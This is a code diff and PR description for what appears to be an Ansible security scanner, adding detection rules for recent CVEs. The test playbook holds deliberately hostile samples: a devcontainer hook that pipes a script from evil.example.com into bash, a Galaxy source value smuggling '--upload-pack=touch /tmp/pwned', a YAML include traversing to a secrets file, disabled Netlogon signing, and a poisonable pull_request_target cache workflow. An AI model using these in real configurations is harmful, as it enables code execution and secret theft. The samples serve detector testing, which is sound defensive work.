     - clickhouse_access_management_user_enabled
     - crontab_modification
     - dll_search_order_hijack_drop_into_system_or_program_files
@@ -890,6 +900,7 @@ rules_by_category:
     - file_permission_777
     - firewall_rule_modification
     - firmware_update_service_disabled_fwupd_uefi_capsule
+    - fortiweb_vulnerable_version_pinned
     - grub2_password_not_set_with_custom_kernel_entries
     - grub_password_disabled_or_set_from_playbook
     - io_uring_runtime_enabled_without_seccomp_filter
@@ -921,6 +932,7 @@ rules_by_category:
     - redis_module_load_arbitrary_so
     - root_ssh_key_modification
     - runc_leaky_vessels_vulnerable_install
+    - sap_netweaver_vulnerable_version_pinned
     - setuid_binary_creation_compromise
     - shadow_file_access
     - ssh_keygen_empty_passphrase_privileged_key
@@ -931,6 +943,7 @@ rules_by_category:
     - userfaultfd_kernel_exploit_primitive
     - web_shell_drop
     - windows_defender_tamper
+    - windows_netlogon_unpatched_pinned_no_enforcement
     - windows_shadow_copies_delete
 
   template_injection:

--- a/tests/playbooks/bad_example.yml
+++ b/tests/playbooks/bad_example.yml
@@ -5495,3 +5495,82 @@
     # --- obfuscation_evasion.yml: inline_env_var_secret_laundering ---
     - name: trigger inline_env_var_secret_laundering
       ansible.builtin.shell: 'API_TOKEN="{{ vault_api_token }}" python3 -c "import os; print(os.environ[''API_TOKEN''])"'
+
+    # --- supply_chain.yml: ci_oidc_token_minted_then_piped_to_signing ---
+    - name: trigger ci_oidc_token_minted_then_piped_to_signing
+      ansible.builtin.shell: |
+        TOKEN=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sigstore" | jq -r .value)
+        cosign sign --identity-token "$TOKEN" myregistry.example.com/app:1.0.0
+
+    # --- supply_chain.yml: config_file_with_embedded_run_on_event_command ---
+    - name: trigger config_file_with_embedded_run_on_event_command
+      ansible.builtin.copy:
+        dest: /srv/project/.devcontainer/devcontainer.json
+        content: '{ "postCreateCommand": "curl http://evil.example.com/i.sh | bash" }'
+
+    # --- ai_ml_security.yml: ai_assistant_config_or_hook_file_planted ---
+    - name: trigger ai_assistant_config_or_hook_file_planted
+      ansible.builtin.copy:
+        src: files/settings.json
+        dest: /home/dev/project/.claude/settings.json
+
+    # --- ansible_specific.yml: unsafe_content_rerendered_via_hostvars ---
+    - name: trigger unsafe_content_rerendered_via_hostvars
+      ansible.builtin.set_fact:
+        rerendered_value: "{{ hostvars[inventory_hostname]['ansible_local']['x'] }}"
+
+    # --- ansible_specific.yml: git_checkout_jinja_in_branch_or_refspec ---
+    - name: trigger git_checkout_jinja_in_branch_or_refspec
+      ansible.builtin.git:
+        repo: https://git.example.com/app
+        dest: /srv/app
+        version: "{{ event.payload.ref }}"
+
+    # --- ansible_specific.yml: awx_config_yaml_include_path_traversal ---
+    - name: trigger awx_config_yaml_include_path_traversal
+      ansible.builtin.copy:
+        dest: /opt/awx/config.yml
+        content: |
+          creds: !include ../../etc/awx/secrets.yml
+
+    # --- system_compromise.yml: citrix_netscaler_vulnerable_firmware_pinned ---
+    - name: trigger citrix_netscaler_vulnerable_firmware_pinned
+      ansible.builtin.set_fact:
+        netscaler_firmware: "build 14.1-25.56"
+
+    # --- system_compromise.yml: checkpoint_gateway_vulnerable_version_pinned ---
+    - name: trigger checkpoint_gateway_vulnerable_version_pinned
+      ansible.builtin.set_fact:
+        checkpoint_gateway_version: "R81.10"
+
+    # --- system_compromise.yml: fortiweb_vulnerable_version_pinned ---
+    - name: trigger fortiweb_vulnerable_version_pinned
+      ansible.builtin.set_fact:
+        fortiweb_version: "7.6.2"
+
+    # --- system_compromise.yml: windows_netlogon_unpatched_pinned_no_enforcement ---
+    - name: trigger windows_netlogon_unpatched_pinned_no_enforcement
+      ansible.builtin.set_fact:
+        RequireSignOrSeal: 0
+
+    # --- system_compromise.yml: sap_netweaver_vulnerable_version_pinned ---
+    - name: trigger sap_netweaver_vulnerable_version_pinned
+      ansible.builtin.set_fact:
+        sap_netweaver_sp_level: "SP08"
+
+    # --- supply_chain.yml: ci_cache_restored_in_privileged_pull_request_target_job ---
+    - name: trigger ci_cache_restored_in_privileged_pull_request_target_job
+      ansible.builtin.copy:
+        dest: .github/workflows/cache.yml
+        content: |
+          on:
+            pull_request_target:
+              types: [opened, synchronize]
+          jobs:
+            build:
+              runs-on: ubuntu-latest
+              steps:
+                - uses: actions/cache@v4
+                  with:
+                    path: node_modules
+                    key: deps-${{ hashFiles('package-lock.json') }}

--- a/tests/playbooks/path_scoped/requirements.yml
+++ b/tests/playbooks/path_scoped/requirements.yml
@@ -9,5 +9,7 @@ roles:
   - name: example.role
     src: http://galaxy.example.com/path/to/example-role.tar.gz
     version: main
+  - name: injected.role
+    src: "--upload-pack=touch /tmp/pwned"
 
 # Comment with sensitive value: api_key="abc123XYZ_secret"

--- a/tests/test_cli_env_overrides.py
+++ b/tests/test_cli_env_overrides.py
@@ -17,6 +17,7 @@ import os
 
 import pytest
 
+from ansible_security_scanner import __version__
 from ansible_security_scanner.cli import (
     _env_bool,
     _env_choice,
@@ -212,3 +213,11 @@ def test_env_choice_normalizes_to_canonical_form(clean_env):
         _env_choice("ANSIBLE_SEC_SCANNER_NEVER_SET", ("CRITICAL", "HIGH", "MEDIUM", "LOW"))
         == "HIGH"
     )
+
+
+@pytest.mark.parametrize("flag", ["--version", "-V"])
+def test_version_flag_prints_version_and_exits(parser, capsys, flag):
+    with pytest.raises(SystemExit) as exc:
+        parser.parse_args([flag])
+    assert exc.value.code == 0
+    assert __version__ in capsys.readouterr().out

--- a/tests/test_remediations.py
+++ b/tests/test_remediations.py
@@ -1,8 +1,8 @@
 """Contract tests for the remediation generators.
 
-Every shipped rule must produce a well-formed, rule-specific
-remediation, and every rule that isn't explicitly procedural must carry
-a Secure Fix YAML block. Run with `pytest tests/test_remediations.py`.
+Every shipped rule must produce a well-formed, rule-specific remediation
+that carries a Secure Fix YAML block - there is no procedural opt-out.
+Run with `pytest tests/test_remediations.py`.
 """
 
 from __future__ import annotations
@@ -499,7 +499,7 @@ def test_positive_example_renders_valid_secure_fix(
 # exercises them. They are nonetheless emitted as real findings and must ship a
 # dynamic Secure Fix that reuses the finding's own code. Each example below is a
 # realistic task the rule fires on, paired with a token the dynamic fix must
-# substitute from that code (or ``None`` when the fix is legitimately procedural).
+# substitute from that code.
 STRUCTURAL_RULE_EXAMPLES = [
     (
         "missing_no_log",


### PR DESCRIPTION
Extend detection coverage for recent CVEs and emerging playbook-insertable threats, and make a dynamic Ansible remediation mandatory for every finding.

New rules, each with a copy-pasteable secure fix:

- GitHub Actions cache poisoning in privileged pull_request_target workflows (the 2026 Mini Shai-Hulud chain, CVE-2026-45321), plus a companion OIDC-to-signing rule and a config-file run-on-event planting rule.
- Event-Driven Ansible git branch/refspec template injection (CVE-2025-49521).
- Unsafe content re-rendered through hostvars/vars (CVE-2024-11079).
- awxkit YAML include path traversal (CVE-2026-52902).
- Galaxy requirements src argument injection.
- AI coding-assistant config and hook file planting.
- Vulnerable vendor firmware/version pins: Citrix NetScaler CitrixBleed 2, Check Point gateway, FortiWeb, Windows Netlogon, SAP NetWeaver.

Backfilled CVE tags on related supply-chain, lookup, and fetch rules, and added the referenced CWE and MITRE ATT&CK catalog entries.

Removed the no_ansible_remediation opt-out so the renderer always emits a Secure Fix block, converted the remaining procedural cases to dynamic fixes, and deleted the now-unused stamping helper and its data file.

Added a --version flag to the CLI.